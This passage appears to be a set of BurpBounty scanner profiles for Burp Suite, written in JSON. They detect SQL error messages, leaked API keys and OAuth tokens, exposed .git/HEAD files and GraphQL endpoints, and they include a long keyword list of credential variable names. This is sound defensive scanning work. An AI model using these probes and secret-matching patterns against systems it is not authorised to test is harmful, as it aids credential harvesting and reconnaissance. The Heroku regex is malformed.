"true,Or,PostgreSQL query failed: ERROR: parser: parse error",
"true,Or,Warning: mysql_fetch_array",
"true,Or,Warning: mysql_num_rows",
"true,Or,Warning: mysql_query",
"true,Or,Warning: mysql_fetch_assoc",
"true,Or,Warning: mysql_result",
"true,Or,Warning: mysql_free_result"
],
"Tags": [
"SQLi",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 5,
"payloadPosition": 2,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "ErrorSQLi",
"IssueSeverity": "High",
"IssueConfidence": "Certain",
"IssueDetail": "Error SQLi with payloads: \u003cbr\u003e \u003cpayload\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Facebook_Client_ID.bb | [
{
"ProfileName": "Facebook_Client_ID",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)(facebook|fb)(.{0,20})?[\u0027\\\"][0-9]{13,17}"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Facebook client ID",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Facebook_OAuth.bb | [
{
"ProfileName": "Facebook_OAuth",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\u0027|\\\"][0-9a-f]{32}[\u0027|\\\"]"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Facebook OAuth",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/find-Tokens.bb | [
{
"ProfileName": "find-Tokens",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@ayadi0x1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)(([a-z0-9]+)[-|_])?(key|password|passwd|pass|pwd|private|credential|auth|cred|creds|secret|access|token)([-|_][a-z]+)?(\\s)*(:|\u003d)+"
],
"Tags": [
"token",
"API",
"regex",
"InformationDisclosure",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": true,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Token Founded",
"IssueSeverity": "Medium",
"IssueConfidence": "Firm",
"IssueDetail": "api key - secrets - leaks founded ",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/GCP_Service_Account.bb | [
{
"ProfileName": "GCP_Service_Account",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,\\\"type\\\": \\\"service_account\\\""
],
"Tags": [
"Cloud",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "GCP Service Account",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/GCP_Urls.bb | [
{
"ProfileName": "GCP_Urls",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,.corp.google.com",
"true,Or,.c.googlers.com"
],
"Tags": [
"Cloud",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "GCP Urls found",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/GitFinder.bb | [
{
"ProfileName": "GitFinder",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,/.git/HEAD"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,refs"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 4,
"MaxRedir": 5,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "GitFinder",
"IssueSeverity": "Low",
"IssueConfidence": "Firm",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
65
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Gmail_Oauth_2.0.bb | [
{
"ProfileName": "Gmail_Oauth_2.0",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Gmail Oauth 2.0",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Google_Cloud_Buckets.bb | [
{
"ProfileName": "Google_Cloud_Buckets",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(\\.storage\\.googleapis\\.com)|(\\.storage\\.cloud\\.googleapis\\.com)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Google Cloud Buckets",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Google_Cloud_Platform_OAuth_2.0.bb | [
{
"ProfileName": "Google_Cloud_Platform_OAuth_2.0",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,^([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})",
"true,Or,[^a-zA-Z0-9]([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Google Cloud Platform OAuth 2.0",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Google_Drive_OAuth.bb | [
{
"ProfileName": "Google_Drive_OAuth",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Google Drive OAuth",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Google_Oauth.bb | [
{
"ProfileName": "Google_Oauth",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,^(ya29\\.[0-9A-Za-z\\-_]+)",
"true,Or,[^a-zA-Z0-9](ya29\\.[0-9A-Za-z\\-_]+)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Google Oauth",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/GraphqlPath.bb | [
{
"ProfileName": "GraphqlPath",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@Sy3Omda",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Name,/graphql",
"true,Or,All Request,Name,/graphql/console",
"true,Or,All Request,Name,/graphql.php",
"true,Or,All Request,Name,/graphiql",
"true,Or,All Request,Name,/graphiql.php",
"true,Or,All Request,Name,/explorer",
"true,Or,All Request,Name,/altair",
"true,Or,All Request,Name,/playground",
"true,Or,All Request,Name,/v1/graphql",
"true,Or,All Request,Name,/v1/graphql/console",
"true,Or,All Request,Name,/v1/graphql.php",
"true,Or,All Request,Name,/v1/graphiql",
"true,Or,All Request,Name,/v1/graphiql.php",
"true,Or,All Request,Name,/v1/explorer",
"true,Or,All Request,Name,/v1/alt4ir",
"true,Or,All Request,Name,/v1/playground",
"true,Or,All Request,Name,/v2/graphql",
"true,Or,All Request,Name,/v2/graphql/console",
"true,Or,All Request,Name,/v2/graphql.php",
"true,Or,All Request,Name,/v2/graphiql",
"true,Or,All Request,Name,/v2/graphiql.php",
"true,Or,All Request,Name,/v2/explorer",
"true,Or,All Request,Name,/v2/altair",
"true,Or,All Request,Name,/v2/playground"
],
"Tags": [
"Graphql",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Graphql Path Found",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Graphql Path Found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Heroku_OAuth_2.0.bb | [
{
"ProfileName": "Heroku_OAuth_2.0",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,^(0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})",
"true,Or,[^a-zA-Z0-9](0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Heroku OAuth 2.0",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/HockeyApp_Key.bb | [
{
"ProfileName": "HockeyApp_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)hockey.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{32}(\\\\\\\"|\u0027|`)?"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "HockeyApp Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Interesting_Keyworks.bb | [
{
"ProfileName": "Interesting_Keyworks",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,adzerk[_-]api[_-]key",
"true,Or,algolia[_-]admin[_-]key[_-]1",
"true,Or,algolia[_-]admin[_-]key[_-]2",
"true,Or,algolia[_-]admin[_-]key[_-]mcm",
"true,Or,algolia[_-]api[_-]key",
"true,Or,algolia[_-]api[_-]key[_-]mcm",
"true,Or,algolia[_-]api[_-]key[_-]search",
"true,Or,algolia[_-]search[_-]api[_-]key",
"true,Or,algolia[_-]search[_-]key",
"true,Or,algolia[_-]search[_-]key[_-]1",
"true,Or,alicloud[_-]access[_-]key",
"true,Or,alicloud[_-]secret[_-]key",
"true,Or,amazon[_-]bucket[_-]name",
"true,Or,amazon[_-]secret[_-]access[_-]key",
"true,Or,anaconda[_-]token",
"true,Or,android[_-]docs[_-]deploy[_-]token",
"true,Or,ansible[_-]vault[_-]password",
"true,Or,apiary[_-]api[_-]key",
"true,Or,apigw[_-]access[_-]token",
"true,Or,app[_-]bucket[_-]perm",
"true,Or,app[_-]report[_-]token[_-]key",
"true,Or,apple[_-]id[_-]password",
"true,Or,argos[_-]token",
"true,Or,artifactory[_-]key",
"true,Or,artifacts[_-]aws[_-]access[_-]key[_-]id",
"true,Or,artifacts[_-]aws[_-]secret[_-]access[_-]key",
"true,Or,artifacts[_-]bucket",
"true,Or,artifacts[_-]key",
"true,Or,artifacts[_-]secret",
"true,Or,assistant[_-]iam[_-]apikey",
"true,Or,auth0[_-]api[_-]clientsecret",
"true,Or,auth0[_-]client[_-]secret",
"true,Or,author[_-]email[_-]addr",
"true,Or,author[_-]npm[_-]api[_-]key",
"true,Or,aws[_-]access[_-]key",
"true,Or,aws[_-]access[_-]key[_-]id",
"true,Or,aws[_-]config[_-]accesskeyid",
"true,Or,aws[_-]config[_-]secretaccesskey",
"true,Or,aws[_-]secret[_-]access[_-]key",
"true,Or,aws[_-]secret[_-]key",
"true,Or,aws[_-]ses[_-]access[_-]key[_-]id",
"true,Or,aws[_-]ses[_-]secret[_-]access[_-]key",
"true,Or,awscn[_-]access[_-]key[_-]id",
"true,Or,awscn[_-]secret[_-]access[_-]key",
"true,Or,b2[_-]app[_-]key",
"true,Or,b2[_-]bucket",
"true,Or,bintray[_-]api[_-]key",
"true,Or,bintray[_-]apikey",
"true,Or,bintray[_-]gpg[_-]password",
"true,Or,bintray[_-]key",
"true,Or,bintray[_-]token",
"true,Or,bluemix[_-]api[_-]key",
"true,Or,bluemix[_-]auth",
"true,Or,bluemix[_-]pass",
"true,Or,bluemix[_-]pass[_-]prod",
"true,Or,bluemix[_-]password",
"true,Or,bluemix[_-]pwd",
"true,Or,bluemix[_-]username",
"true,Or,brackets[_-]repo[_-]oauth[_-]token",
"true,Or,browser[_-]stack[_-]access[_-]key",
"true,Or,browserstack[_-]access[_-]key",
"true,Or,bucketeer[_-]aws[_-]access[_-]key[_-]id",
"true,Or,bucketeer[_-]aws[_-]secret[_-]access[_-]key",
"true,Or,built[_-]branch[_-]deploy[_-]key",
"true,Or,bundlesize[_-]github[_-]token",
"true,Or,bx[_-]password",
"true,Or,bx[_-]username",
"true,Or,cache[_-]s3[_-]secret[_-]key",
"true,Or,cargo[_-]token",
"true,Or,cattle[_-]access[_-]key",
"true,Or,cattle[_-]agent[_-]instance[_-]auth",
"true,Or,cattle[_-]secret[_-]key",
"true,Or,censys[_-]secret",
"true,Or,certificate[_-]password",
"true,Or,cf[_-]password",
"true,Or,cheverny[_-]token",
"true,Or,chrome[_-]client[_-]secret",
"true,Or,chrome[_-]refresh[_-]token",
"true,Or,ci[_-]deploy[_-]password",
"true,Or,ci[_-]project[_-]url",
"true,Or,ci[_-]registry[_-]user",
"true,Or,ci[_-]server[_-]name",
"true,Or,ci[_-]user[_-]token",
"true,Or,claimr[_-]database",
"true,Or,claimr[_-]db",
"true,Or,claimr[_-]superuser",
"true,Or,claimr[_-]token",
"true,Or,cli[_-]e2e[_-]cma[_-]token",
"true,Or,client[_-]secret",
"true,Or,clojars[_-]password",
"true,Or,cloud[_-]api[_-]key",
"true,Or,cloudant[_-]archived[_-]database",
"true,Or,cloudant[_-]audited[_-]database",
"true,Or,cloudant[_-]database",
"true,Or,cloudant[_-]instance",
"true,Or,cloudant[_-]order[_-]database",
"true,Or,cloudant[_-]parsed[_-]database",
"true,Or,cloudant[_-]password",
"true,Or,cloudant[_-]processed[_-]database",
"true,Or,cloudant[_-]service[_-]database",
"true,Or,cloudflare[_-]api[_-]key",
"true,Or,cloudflare[_-]auth[_-]email",
"true,Or,cloudflare[_-]auth[_-]key",
"true,Or,cloudflare[_-]email",
"true,Or,cloudinary[_-]url",
"true,Or,cloudinary[_-]url[_-]staging",
"true,Or,clu[_-]repo[_-]url",
"true,Or,clu[_-]ssh[_-]private[_-]key[_-]base64",
"true,Or,cn[_-]access[_-]key[_-]id",
"true,Or,cn[_-]secret[_-]access[_-]key",
"true,Or,cocoapods[_-]trunk[_-]email",
"true,Or,cocoapods[_-]trunk[_-]token",
"true,Or,codacy[_-]project[_-]token",
"true,Or,codeclimate[_-]repo[_-]token",
"true,Or,codecov[_-]token",
"true,Or,coding[_-]token",
"true,Or,conekta[_-]apikey",
"true,Or,contentful[_-]access[_-]token",
"true,Or,contentful[_-]cma[_-]test[_-]token",
"true,Or,contentful[_-]integration[_-]management[_-]token",
"true,Or,contentful[_-]management[_-]api[_-]access[_-]token",
"true,Or,contentful[_-]management[_-]api[_-]access[_-]token[_-]new",
"true,Or,contentful[_-]php[_-]management[_-]test[_-]token",
"true,Or,contentful[_-]test[_-]org[_-]cma[_-]token",
"true,Or,contentful[_-]v2[_-]access[_-]token",
"true,Or,conversation[_-]password",
"true,Or,conversation[_-]username",
"true,Or,cos[_-]secrets",
"true,Or,coveralls[_-]api[_-]token",
"true,Or,coveralls[_-]repo[_-]token",
"true,Or,coveralls[_-]token",
"true,Or,coverity[_-]scan[_-]token",
"true,Or,cypress[_-]record[_-]key",
"true,Or,danger[_-]github[_-]api[_-]token",
"true,Or,database[_-]host",
"true,Or,database[_-]name",
"true,Or,database[_-]password",
"true,Or,database[_-]port",
"true,Or,database[_-]user",
"true,Or,database[_-]username",
"true,Or,datadog[_-]api[_-]key",
"true,Or,datadog[_-]app[_-]key",
"true,Or,db[_-]connection",
"true,Or,db[_-]database",
"true,Or,db[_-]host",
"true,Or,db[_-]password",
